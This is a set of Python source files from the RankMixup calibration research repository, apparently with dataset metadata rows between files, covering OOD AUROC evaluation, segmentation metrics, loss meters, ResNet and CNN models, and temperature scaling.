bin_labels_entropies = torch.cat((bin_labels_entropies, bin_label_entropy))
bin_labels_confidences = torch.cat((bin_labels_confidences, bin_label_confidence))
entropies = torch.cat((entropies, entrop))
confidences = torch.cat((confidences, conf))
b, c, h, w = data.shape
# Getting entropies for OOD data
for i, (data, label) in enumerate(ood_test_loader):
data = F.interpolate(data, size=(h, w), mode='bilinear')
data = data.to(device)
label = label.to(device)
#data += noise.to(device)
bin_label_entropy = torch.ones(label.shape).to(device)
bin_label_confidence = torch.zeros(label.shape).to(device)
net_output = net(data)
entrop = entropy(net_output)
conf = confidence(net_output)
bin_labels_entropies = torch.cat((bin_labels_entropies, bin_label_entropy))
bin_labels_confidences = torch.cat((bin_labels_confidences, bin_label_confidence))
entropies = torch.cat((entropies, entrop))
confidences = torch.cat((confidences, conf))
fpr_entropy, tpr_entropy, thresholds_entropy = metrics.roc_curve(bin_labels_entropies.cpu().numpy(), entropies.cpu().numpy())
fpr_confidence, tpr_confidence, thresholds_confidence = metrics.roc_curve(bin_labels_confidences.cpu().numpy(), confidences.cpu().numpy())
auc_entropy = metrics.roc_auc_score(bin_labels_entropies.cpu().numpy(), entropies.cpu().numpy())
auc_confidence = metrics.roc_auc_score(bin_labels_confidences.cpu().numpy(), confidences.cpu().numpy())
# return (bin_labels_confidences.cpu().numpy(), confidences.cpu().numpy()), (bin_labels_entropies.cpu().numpy(), entropies.cpu().numpy()), (fpr_entropy, tpr_entropy, thresholds_entropy), (fpr_confidence, tpr_confidence, thresholds_confidence), auc_entropy, auc_confidence
return (bin_labels_confidences.cpu().numpy(), confidences.cpu().numpy()), (bin_labels_entropies.cpu().numpy(), entropies.cpu().numpy())
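# Minimal smoke-test sketch: exercises get_roc_auc with a tiny stand-in classifier and
# random in-distribution/OOD loaders. TinyNet and all tensor sizes below are illustrative
# assumptions, not part of the evaluation pipeline.
if __name__ == "__main__":
    import torch.nn as nn
    from torch.utils.data import DataLoader, TensorDataset

    class TinyNet(nn.Module):
        def __init__(self, num_classes=10):
            super().__init__()
            self.pool = nn.AdaptiveAvgPool2d(1)
            self.fc = nn.Linear(3, num_classes)

        def forward(self, x):
            return self.fc(self.pool(x).flatten(1))

    device = "cuda:0" if torch.cuda.is_available() else "cpu"
    net = TinyNet().to(device)
    in_loader = DataLoader(
        TensorDataset(torch.randn(64, 3, 32, 32), torch.randint(0, 10, (64,))), batch_size=32)
    ood_loader = DataLoader(
        TensorDataset(torch.randn(64, 3, 28, 28), torch.randint(0, 10, (64,))), batch_size=32)
    conf_scores, ent_scores = get_roc_auc(net, in_loader, ood_loader, device)
    print("confidence-based AUROC:", metrics.roc_auc_score(*conf_scores))
    print("entropy-based AUROC:", metrics.roc_auc_score(*ent_scores))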
| 3,479 | Python | .py | 63 | 45.873016 | 276 | 0.649794 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,894 | segment_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/segment_evaluator.py | import logging
import numpy as np
from terminaltables import AsciiTable
import pandas as pd
from typing import List, Optional
import wandb
from .evaluator import DatasetEvaluator
from calibrate.utils.constants import EPS
logger = logging.getLogger(__name__)
def intersect_and_union(pred_label, label, num_classes, ignore_index):
mask = (label != ignore_index)
pred_label = pred_label[mask]
label = label[mask]
intersect = pred_label[pred_label == label]
area_intersect, _ = np.histogram(
intersect, bins=np.arange(num_classes + 1)
)
area_pred_label, _ = np.histogram(
pred_label, bins=np.arange(num_classes + 1)
)
area_label, _ = np.histogram(
label, bins=np.arange(num_classes + 1)
)
area_union = area_pred_label + area_label - area_intersect
return area_intersect, area_union, area_pred_label, area_label
class SegmentEvaluator(DatasetEvaluator):
def __init__(self,
classes: Optional[List[str]] = None,
ignore_index: int = -1) -> None:
super().__init__()
self.classes = classes
self.num_classes = len(self.classes)
self.ignore_index = ignore_index
def num_samples(self):
return self.nsamples
def reset(self):
        self.total_area_inter = np.zeros((self.num_classes, ), dtype=np.float64)
        self.total_area_union = np.zeros((self.num_classes, ), dtype=np.float64)
        self.total_area_pred = np.zeros((self.num_classes, ), dtype=np.float64)
        self.total_area_target = np.zeros((self.num_classes, ), dtype=np.float64)
self.nsamples = 0
def main_metric(self):
return "miou"
def ignore_background(self, pred: np.ndarray, target: np.ndarray):
pred = pred[:, 1:] if pred.shape[1] > 1 else pred
target = target[:, 1:] if target.shape[1] > 1 else target
return pred, target
def update(self, pred: np.ndarray, target: np.ndarray):
"""Update all the metric from batch size prediction and target.
Args:
pred: predictions to be evaluated in one-hot formation
y: ground truth. It should be one-hot format.
"""
assert pred.shape == target.shape, "pred and target should have same shapes"
n = pred.shape[0]
self.nsamples += n
        batch_area_inter = np.zeros((self.num_classes, ), dtype=np.float64)
        batch_area_union = np.zeros((self.num_classes, ), dtype=np.float64)
        batch_area_pred = np.zeros((self.num_classes, ), dtype=np.float64)
        batch_area_target = np.zeros((self.num_classes, ), dtype=np.float64)
for i in range(n):
area_inter, area_union, area_pred, area_target = (
intersect_and_union(
pred[i], target[i], self.num_classes, self.ignore_index
)
)
batch_area_inter += area_inter
batch_area_union += area_union
batch_area_pred += area_pred
batch_area_target += area_target
iou = batch_area_inter[1:].sum() / (batch_area_union[1:].sum() + EPS)
self.curr = {"iou": iou}
# update the total
self.total_area_inter += batch_area_inter
self.total_area_union += batch_area_union
self.total_area_pred += batch_area_pred
self.total_area_target += batch_area_target
def curr_score(self):
return self.curr
def mean_score(self, main=False):
mdice = (
2 * self.total_area_inter[1:]
/ (self.total_area_pred[1:] + self.total_area_target[1:] + EPS)
).mean()
miou = (
self.total_area_inter[1:] / (self.total_area_union[1:] + EPS)
).mean()
macc = (
self.total_area_inter[1:] / (self.total_area_target[1:] + EPS)
).mean()
if main:
return miou
else:
return {"mdsc": mdice, "miou": miou, "macc": macc}
def class_score(self, print=True, return_dataframe=False):
class_acc = self.total_area_inter[1:] / (self.total_area_target[1:] + EPS)
class_dice = (
2 * self.total_area_inter[1:]
/ (self.total_area_pred[1:] + self.total_area_target[1:] + EPS)
)
class_iou = self.total_area_inter[1:] / (self.total_area_union[1:] + EPS)
columns = ["id", "Class", "iou", "dsc", "acc"]
class_table_data = [columns]
for i in range(class_acc.shape[0]):
class_table_data.append(
[i] + [self.classes[i + 1]]
+ ["{:.4f}".format(class_iou[i])]
+ ["{:.4f}".format(class_dice[i])]
+ ["{:.4f}".format(class_acc[i])]
)
class_table_data.append(
[""] + ["mean"]
+ ["{:.4f}".format(np.mean(class_iou))]
+ ["{:.4f}".format(np.mean(class_dice))]
+ ["{:.4f}".format(np.mean(class_acc))]
)
if print:
table = AsciiTable(class_table_data)
logger.info("\n" + table.table)
if return_dataframe:
data = {key: [] for key in columns}
for i in range(class_acc.shape[0]):
data[columns[0]].append(i)
data[columns[1]].append(self.classes[i + 1])
data[columns[2]].append(class_iou[i])
data[columns[3]].append(class_dice[i])
data[columns[4]].append(class_acc[i])
data[columns[0]].append(None)
data[columns[1]].append("mean")
data[columns[2]].append(np.mean(class_iou))
data[columns[3]].append(np.mean(class_dice))
data[columns[4]].append(np.mean(class_acc))
return pd.DataFrame(data, columns=columns)
def wandb_score_table(self):
table_data = self.class_score(print=False, return_dataframe=True)
return wandb.Table(dataframe=table_data)
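# Minimal usage sketch: runs the evaluator on random label maps. The class names,
# ignore index and array shapes below are illustrative assumptions only.
if __name__ == "__main__":
    evaluator = SegmentEvaluator(classes=["background", "organ"], ignore_index=255)
    evaluator.reset()
    pred = np.random.randint(0, 2, size=(4, 16, 16))
    target = np.random.randint(0, 2, size=(4, 16, 16))
    evaluator.update(pred, target)
    print(evaluator.curr_score())   # IoU of the latest batch
    print(evaluator.mean_score())   # running mdsc / miou / macc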
| 5,903 | Python | .py | 136 | 33.720588 | 84 | 0.578865 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,895 | meter.py | cvlab-yonsei_RankMixup/calibrate/evaluation/meter.py | import numpy as np
import torch
from typing import Dict, Optional, List
class AverageMeter:
"""Computes and stores the average and current value"""
def __init__(self) -> None:
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def reset(self) -> None:
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val: float, n: int = 1) -> None:
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class LossMeter:
"""A class wrapper to record the values of a loss function.
Support loss function with mutiple returning terms [num_terms]
"""
def __init__(self, num_terms: int = 1, names: Optional[List] = None) -> None:
self.num_terms = num_terms
self.names = (
names if names is not None
else ["loss" if i == 0 else "loss_" + str(i) for i in range(self.num_terms)]
)
self.meters = [AverageMeter() for _ in range(self.num_terms)]
def reset(self):
for meter in self.meters:
meter.reset()
def avg(self, index=None):
if index is None:
ret = {}
for name, meter in zip(self.names, self.meters):
ret[name] = meter.avg
return ret
else:
return self.meters[index].avg
def update(self, val, n: int = 1):
if not isinstance(val, tuple):
val = [val]
for x, meter in zip(val, self.meters):
if isinstance(x, torch.Tensor):
x = x.item()
meter.update(x, n)
def get_vals(self) -> Dict:
ret = {}
for name, meter in zip(self.names, self.meters):
ret[name] = meter.val
return ret
def print_status(self) -> str:
ret = []
for name, meter in zip(self.names, self.meters):
ret.append("{} {:.4f} ({:.4f})".format(name, meter.val, meter.avg))
return "\t".join(ret)
def get_avgs(self) -> Dict:
ret = {}
for name, meter in zip(self.names, self.meters):
ret[name] = meter.avg
return ret
def print_avg(self) -> str:
ret = []
for name, meter in zip(self.names, self.meters):
ret.append("{} {:.4f}".format(name, meter.avg))
return "\t".join(ret)
def logit_stats(batch):
    """Mean and maximum gap between the largest and second-largest logit in a batch."""
    # mean = batch.cpu().data.numpy().mean()
    batch_numpy = batch.cpu().data.numpy()
    maxValuesPos = batch_numpy.argmax(axis=1)
    maxValuesA = batch_numpy.max(axis=1)
    # mask out the top logit so the next max() yields the runner-up
    # TODO: improve this; masking with -10 assumes all logits are greater than -10
    for i in range(len(maxValuesPos)):
        batch_numpy[i][maxValuesPos[i]] = -10
    maxValuesB = batch_numpy.max(axis=1)
    absDif = maxValuesA - maxValuesB
    meanOfMax = absDif.mean()
    absDifMax = np.amax(absDif)
    return meanOfMax, absDifMax
def logit_stats_v2(batch):
#mean = batch.cpu().data.numpy().mean()
minValues = batch.cpu().data.numpy().min(axis=1)
maxValues = batch.cpu().data.numpy().max(axis=1)
    absDif = maxValues - minValues
absDifMax = np.amax(absDif)
meanOfMax = absDif.mean()
allDiff = np.zeros((batch.cpu().data.numpy().shape))
for i in range(allDiff.shape[1]):
allDiff[:, i] = maxValues - batch.cpu().data.numpy()[:, i]
return meanOfMax, absDifMax, absDif, allDiff
def logit_diff(batch):
minValues = batch.cpu().data.numpy().min(axis=1)
maxValues = batch.cpu().data.numpy().max(axis=1)
all_diff = maxValues - minValues
max_diff = np.amax(all_diff)
min_diff = np.amin(all_diff)
mean_diff = all_diff.mean()
return all_diff, max_diff, min_diff, mean_diff
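# Minimal usage sketch: accumulates a two-term loss over a few steps with LossMeter.
# The term names and loss values are arbitrary illustrative numbers.
if __name__ == "__main__":
    meter = LossMeter(num_terms=2, names=["loss", "loss_ce"])
    for step in range(3):
        total, ce = 1.0 / (step + 1), 0.5 / (step + 1)
        meter.update((torch.tensor(total), torch.tensor(ce)), n=32)
    print(meter.print_avg())   # running averages of both terms
    print(meter.get_avgs())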
| 3,745 | Python | .py | 102 | 29.029412 | 88 | 0.588154 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,896 | ng_model.py | cvlab-yonsei_RankMixup/calibrate/net/ng_model.py | import torch
import torch.nn as nn
import torch.nn.functional as F
class GlobalPoolingCNN(nn.Module):
def __init__(self, keep_prob=0.5, temp=1.0, num_classes=20):
super(GlobalPoolingCNN, self).__init__()
self.num_classes = num_classes
self.conv1 = nn.Conv1d(in_channels=100, out_channels=128, kernel_size=5, stride=1, padding=0)
self.conv2 = nn.Conv1d(in_channels=128, out_channels=128, kernel_size=5, stride=1, padding=0)
self.conv3 = nn.Conv1d(in_channels=128, out_channels=128, kernel_size=5, stride=1, padding=0)
self.fc1 = nn.Linear(128, 128)
self.fc2 = nn.Linear(128, self.num_classes)
# self.dropout = nn.Dropout(p=1-keep_prob)
self.temp = temp
def forward(self, x): #x: batchsize x step x 100
out = F.relu(self.conv1(x.transpose(1,2)))
out = F.max_pool1d(out, kernel_size=5, stride=1)
out = F.relu(self.conv2(out))
out = F.max_pool1d(out, kernel_size=5, stride=1)
out = F.relu(self.conv3(out))
# batch x step x feature_size
# now global max pooling layer
        out, _ = torch.max(out, dim=2)  # the 128 channels are preserved; the max is taken along the step dimension
# out = self.dropout(F.relu(self.fc1(out)))
out = F.relu(self.fc1(out))
out = self.fc2(out) / self.temp
return out
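# Minimal shape-check sketch: the batch size, sequence length and class count below are
# arbitrary assumptions.
if __name__ == "__main__":
    model = GlobalPoolingCNN(keep_prob=0.5, temp=1.0, num_classes=20)
    dummy = torch.randn(4, 50, 100)   # batch x steps x embedding_dim
    logits = model(dummy)
    print(logits.shape)               # torch.Size([4, 20])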
| 1,359 | Python | .py | 27 | 42.666667 | 108 | 0.637321 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,897 | resnet_cifar.py | cvlab-yonsei_RankMixup/calibrate/net/resnet_cifar.py | '''
Pytorch implementation of ResNet models.
Reference:
[1] He, K., Zhang, X., Ren, S., Sun, J.: Deep residual learning for image recognition. In: CVPR, 2016.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(BasicBlock, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(self.expansion*planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, num_blocks, num_classes=10, temp=1.0):
super(ResNet, self).__init__()
self.in_planes = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
self.fc = nn.Linear(512*block.expansion, num_classes)
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.temp = temp
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward_feature(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
return out
def forward_logit(self, x):
x = F.relu(self.bn1(self.conv1(x)))
# x = self.maxpool(x)
x_level = []
x = self.layer1(x)
x_level.append(x)
x = self.layer2(x)
x_level.append(x)
x = self.layer3(x)
x_level.append(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
logits = []
for i in range(3):
x_logit = self.avgpool(x_level[i])
x_logit = x_logit.view(x_logit.size(0), -1)
logits.append(x_logit)
logits.append(x)
# x = self.fc(x) / self.temp
return logits
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
out = self.fc(out) / self.temp
return out
def resnet18(temp=1.0, **kwargs):
model = ResNet(BasicBlock, [2, 2, 2, 2], temp=temp, **kwargs)
return model
def resnet34(temp=1.0, **kwargs):
model = ResNet(BasicBlock, [3, 4, 6, 3], temp=temp, **kwargs)
return model
def resnet50(temp=1.0, **kwargs):
model = ResNet(Bottleneck, [3, 4, 6, 3], temp=temp, **kwargs)
return model
def resnet101(temp=1.0, **kwargs):
model = ResNet(Bottleneck, [3, 4, 23, 3], temp=temp, **kwargs)
return model
def resnet110(temp=1.0, **kwargs):
model = ResNet(Bottleneck, [3, 4, 26, 3], temp=temp, **kwargs)
return model
def resnet152(temp=1.0, **kwargs):
model = ResNet(Bottleneck, [3, 8, 36, 3], temp=temp, **kwargs)
return model
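# Minimal sanity-check sketch: builds the CIFAR-style ResNet-34 and runs a forward pass
# on a random 32x32 batch; batch size and class count are arbitrary assumptions.
if __name__ == "__main__":
    model = resnet34(num_classes=10)
    logits = model(torch.randn(2, 3, 32, 32))
    print(logits.shape)   # torch.Size([2, 10])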
| 5,344 | Python | .py | 129 | 33.186047 | 102 | 0.601785 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,898 | temperature_scaling.py | cvlab-yonsei_RankMixup/calibrate/net/temperature_scaling.py | '''
Code to perform temperature scaling. Adapted from https://github.com/gpleiss/temperature_scaling
'''
import logging
import torch
import numpy as np
from torch import nn, optim
from torch.nn import functional as F
from calibrate.evaluation.metrics import ECELoss
logger = logging.getLogger(__name__)
class ModelWithTemperature(nn.Module):
"""
A thin decorator, which wraps a model with temperature scaling
model (nn.Module):
A classification neural network
NB: Output of the neural network should be the classification logits,
NOT the softmax (or log softmax)!
"""
def __init__(self, model, device="cuda:0", log=True):
super(ModelWithTemperature, self).__init__()
self.model = model
self.temperature = 1.0
self.log = log
self.device = device
def forward(self, input):
logits = self.model(input)
return self.temperature_scale(logits)
def temperature_scale(self, logits):
"""
Perform temperature scaling on logits
"""
        # temperature is a scalar, so the division broadcasts over all logits
return logits / self.temperature
def set_temperature_ng(self, embedding_model, x_val, y_val,
cross_validate="ece",
batch_size=128):
self.model.eval()
embedding_model.eval()
nll_criterion = nn.CrossEntropyLoss().to(self.device)
ece_criterion = ECELoss().to(self.device)
# First: collect all the logits and labels for the validation set
logits_list = []
labels_list = []
batch_size = 128
with torch.no_grad():
for i in range(1 + x_val.shape[0]//batch_size):
data = torch.from_numpy(
x_val[i*batch_size:min((i+1)*batch_size, x_val.shape[0])]
).type(torch.LongTensor).to(self.device)
labels = torch.from_numpy(
np.argmax(y_val[i*batch_size:min((i+1)*batch_size, x_val.shape[0])], 1)
).to(self.device)
emb = embedding_model(data)
logits = self.model(emb)
logits_list.append(logits)
labels_list.append(labels)
logits = torch.cat(logits_list).cuda()
labels = torch.cat(labels_list).cuda()
# Calculate NLL and ECE before temperature scaling
before_temperature_nll = nll_criterion(logits, labels).item()
before_temperature_ece = ece_criterion(logits, labels).item()
if self.log:
logger.info(
'Before temperature - NLL: {:.4f}, ECE: {:.4f}'.format(
before_temperature_nll, before_temperature_ece
)
)
nll_val = 10 ** 7
ece_val = 10 ** 7
T_opt_nll = 1.0
T_opt_ece = 1.0
T = 0.1
for i in range(100):
self.temperature = T
after_temperature_nll = nll_criterion(self.temperature_scale(logits), labels).item()
after_temperature_ece = ece_criterion(self.temperature_scale(logits), labels).item()
if nll_val > after_temperature_nll:
T_opt_nll = T
nll_val = after_temperature_nll
if ece_val > after_temperature_ece:
T_opt_ece = T
ece_val = after_temperature_ece
T += 0.1
if cross_validate == 'ece':
self.temperature = T_opt_ece
else:
self.temperature = T_opt_nll
# Calculate NLL and ECE after temperature scaling
after_temperature_nll = nll_criterion(self.temperature_scale(logits), labels).item()
after_temperature_ece = ece_criterion(self.temperature_scale(logits), labels).item()
if self.log:
logger.info(
'Optimal temperature: {:.3f}'.format(self.temperature)
)
logger.info(
'After temperature - NLL: {:.4f}, ECE: {:.4f}'.format(
after_temperature_nll, after_temperature_ece
)
)
def set_temperature(self,
valid_loader,
cross_validate='ece'):
"""
        Tune the temperature of the model (using the validation set) with cross-validation on ECE or NLL
"""
# self.cuda()
self.model.eval()
nll_criterion = nn.CrossEntropyLoss().to(self.device)
ece_criterion = ECELoss().to(self.device)
# First: collect all the logits and labels for the validation set
logits_list = []
labels_list = []
with torch.no_grad():
for input, label in valid_loader:
input = input.to(self.device)
logits = self.model(input)
logits_list.append(logits)
labels_list.append(label)
logits = torch.cat(logits_list).to(self.device)
labels = torch.cat(labels_list).to(self.device)
# Calculate NLL and ECE before temperature scaling
before_temperature_nll = nll_criterion(logits, labels).item()
before_temperature_ece = ece_criterion(logits, labels).item()
if self.log:
logger.info(
'Before temperature - NLL: {:.4f}, ECE: {:.4f}'.format(
before_temperature_nll, before_temperature_ece
)
)
nll_val = 10 ** 7
ece_val = 10 ** 7
T_opt_nll = 1.0
T_opt_ece = 1.0
T = 0.1
for i in range(100):
self.temperature = T
after_temperature_nll = nll_criterion(self.temperature_scale(logits), labels).item()
after_temperature_ece = ece_criterion(self.temperature_scale(logits), labels).item()
if nll_val > after_temperature_nll:
T_opt_nll = T
nll_val = after_temperature_nll
if ece_val > after_temperature_ece:
T_opt_ece = T
ece_val = after_temperature_ece
T += 0.1
if cross_validate == 'ece':
self.temperature = T_opt_ece
else:
self.temperature = T_opt_nll
# Calculate NLL and ECE after temperature scaling
after_temperature_nll = nll_criterion(self.temperature_scale(logits), labels).item()
after_temperature_ece = ece_criterion(self.temperature_scale(logits), labels).item()
if self.log:
logger.info(
'Optimal temperature: {:.3f}'.format(self.temperature)
)
logger.info(
'After temperature - NLL: {:.4f}, ECE: {:.4f}'.format(
after_temperature_nll, after_temperature_ece
)
)
def set_temperature_seg(self,
valid_loader,
cross_validate='nll'):
"""
        Tune the temperature of the model (using the validation set) with cross-validation on ECE or NLL
"""
# self.cuda()
self.model.eval()
nll_criterion = nn.CrossEntropyLoss().to(self.device)
ece_criterion = ECELoss().to(self.device)
# First: collect all the logits and labels for the validation set
logits_list = []
labels_list = []
with torch.no_grad():
for input, label in valid_loader:
input = input.to(self.device)
logits = self.model(input)
assert logits.shape[0] == label.shape[0]
n, c, x, y = logits.shape
logits = torch.einsum("ncxy->nxyc", logits)
logits = logits.reshape(n * x * y, -1)
label = label.reshape(n * x * y)
                # the original guard `if 0 <= 255:` is always true, so pixels carrying the
                # ignore label (255) are always filtered out before calibration
                index = torch.nonzero(label != 255).squeeze()
                logits = logits[index, :]
                label = label[index]
# dismiss background
index = torch.nonzero(label != 0).squeeze()
logits = logits[index, :].to(self.device)
label = label[index].to(self.device)
logits_list.append(logits)
labels_list.append(label)
logits = torch.cat(logits_list).to(self.device)
labels = torch.cat(labels_list).to(self.device)
# Calculate NLL and ECE before temperature scaling
before_temperature_nll = nll_criterion(logits, labels).item()
before_temperature_ece = ece_criterion(logits, labels).item()
if self.log:
logger.info(
'Before temperature - NLL: {:.4f}, ECE: {:.4f}'.format(
before_temperature_nll, before_temperature_ece
)
)
nll_val = 10 ** 7
ece_val = 10 ** 7
T_opt_nll = 1.0
T_opt_ece = 1.0
T = 0.1
for i in range(100):
self.temperature = T
after_temperature_nll = nll_criterion(self.temperature_scale(logits), labels).item()
after_temperature_ece = ece_criterion(self.temperature_scale(logits), labels).item()
if nll_val > after_temperature_nll:
T_opt_nll = T
nll_val = after_temperature_nll
if ece_val > after_temperature_ece:
T_opt_ece = T
ece_val = after_temperature_ece
T += 0.1
if cross_validate == 'ece':
self.temperature = T_opt_ece
else:
self.temperature = T_opt_nll
# Calculate NLL and ECE after temperature scaling
after_temperature_nll = nll_criterion(self.temperature_scale(logits), labels).item()
after_temperature_ece = ece_criterion(self.temperature_scale(logits), labels).item()
if self.log:
logger.info(
'Optimal temperature: {:.3f}'.format(self.temperature)
)
logger.info(
'After temperature - NLL: {:.4f}, ECE: {:.4f}'.format(
after_temperature_nll, after_temperature_ece
)
)
def get_temperature(self):
return self.temperature
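# Minimal CPU sketch of tuning the wrapper on a validation loader. The linear stand-in
# model and random data are assumptions; running it requires the same calibrate package
# import (ECELoss) that this module already depends on.
if __name__ == "__main__":
    from torch.utils.data import DataLoader, TensorDataset

    base_model = nn.Sequential(nn.Flatten(), nn.Linear(3 * 8 * 8, 5))
    val_set = TensorDataset(torch.randn(128, 3, 8, 8), torch.randint(0, 5, (128,)))
    wrapped = ModelWithTemperature(base_model, device="cpu")
    wrapped.set_temperature(DataLoader(val_set, batch_size=64), cross_validate="ece")
    print("tuned temperature:", wrapped.get_temperature())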
| 10,168 | Python | .py | 238 | 30.508403 | 105 | 0.556925 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,899 | resnet.py | cvlab-yonsei_RankMixup/calibrate/net/resnet.py | import torch
import torch.nn as nn
try:
from torch.hub import load_state_dict_from_url
except ImportError:
from torch.utils.model_zoo import load_url as load_state_dict_from_url
__all__ = ['ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101',
'resnet152', 'resnext50_32x4d', 'resnext101_32x8d',
'wide_resnet50_2', 'wide_resnet101_2']
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',
'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',
'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',
'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',
}
def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=dilation, groups=groups, bias=False, dilation=dilation)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None):
super(BasicBlock, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
if groups != 1 or base_width != 64:
raise ValueError('BasicBlock only supports groups=1 and base_width=64')
if dilation > 1:
raise NotImplementedError("Dilation > 1 not supported in BasicBlock")
# Both self.conv1 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = norm_layer(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = norm_layer(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class Bottleneck(nn.Module):
# Bottleneck in torchvision places the stride for downsampling at 3x3 convolution(self.conv2)
# while original implementation places the stride at the first 1x1 convolution(self.conv1)
# according to "Deep residual learning for image recognition"https://arxiv.org/abs/1512.03385.
# This variant is also known as ResNet V1.5 and improves accuracy according to
# https://ngc.nvidia.com/catalog/model-scripts/nvidia:resnet_50_v1_5_for_pytorch.
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None):
super(Bottleneck, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
width = int(planes * (base_width / 64.)) * groups
# Both self.conv2 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv1x1(inplanes, width)
self.bn1 = norm_layer(width)
self.conv2 = conv3x3(width, width, stride, groups, dilation)
self.bn2 = norm_layer(width)
self.conv3 = conv1x1(width, planes * self.expansion)
self.bn3 = norm_layer(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
